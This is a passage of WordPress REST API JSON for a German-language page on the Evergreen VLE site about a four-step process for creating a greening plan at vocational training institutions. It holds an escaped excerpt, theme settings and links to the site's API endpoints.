f\u00fcr Ihre Berufsbildungseinrichtung zu erstellen, umzusetzen und zu \u00fcberwachen. Die hier zur Verf\u00fcgung gestellten Materialien geben Ihnen das Wissen und die Werkzeuge, die Sie ben\u00f6tigen. Die folgende Vorlage f\u00fcr Ihren individuellen \u00d6kologisierungsplan wird &hellip;<\/p>\n<p class=\"read-more\"> <a class=\"\" href=\"https:\/\/evergreen-vle.eu\/de\/vier-schritte-prozess\/\"> <span class=\"screen-reader-text\">VIER-SCHRITTE-PROZESS<\/span> Weiterlesen &raquo;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"no-sidebar","site-content-layout":"plain-container","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","footnotes":""},"class_list":["post-30592","page","type-page","status-publish","hentry"],"uagb_featured_image_src":{"full":false,"thumbnail":false,"medium":false,"medium_large":false,"large":false,"1536x1536":false,"2048x2048":false},"uagb_author_info":{"display_name":false,"author_link":"https:\/\/evergreen-vle.eu\/de\/author\/admin_evergreen\/"},"uagb_comment_info":0,"uagb_excerpt":"Nachdem Sie die Pr\u00e4sentationen und Arbeitsbl\u00e4tter der 4 Schritte durchgearbeitet haben, werden Sie leicht in der Lage sein, Ihren eigenen individuellen Greening-Plan f\u00fcr Ihre Berufsbildungseinrichtung zu erstellen, umzusetzen und zu \u00fcberwachen. Die hier zur Verf\u00fcgung gestellten Materialien geben Ihnen das Wissen und die Werkzeuge, die Sie ben\u00f6tigen. Die folgende Vorlage f\u00fcr Ihren individuellen \u00d6kologisierungsplan wird&hellip;","_links":{"self":[{"href":"https:\/\/evergreen-vle.eu\/de\/wp-json\/wp\/v2\/pages\/30592","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/evergreen-vle.eu\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/evergreen-vle.eu\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/evergreen-vle.eu\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/evergreen-vle.eu\/de\/wp-json\/wp\/v2\/comments?post=30592"}],"version-history":[{"count":3,"href":"https:\/\/evergreen-vle.eu\/de\/wp-json\/wp\/v2\/pages\/30592\/revisions"}],"predecessor-version":[{"id":30754,"href":"https:\/\/evergreen-vle.eu\/de\/wp-json\/wp\/v2\/pages\/30592\/revisions\/30754"}],"wp:attachment":[{"href":"https:\/\/evergreen-vle.eu\/de\/wp-json\/wp\/v2\/media?parent=30592"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}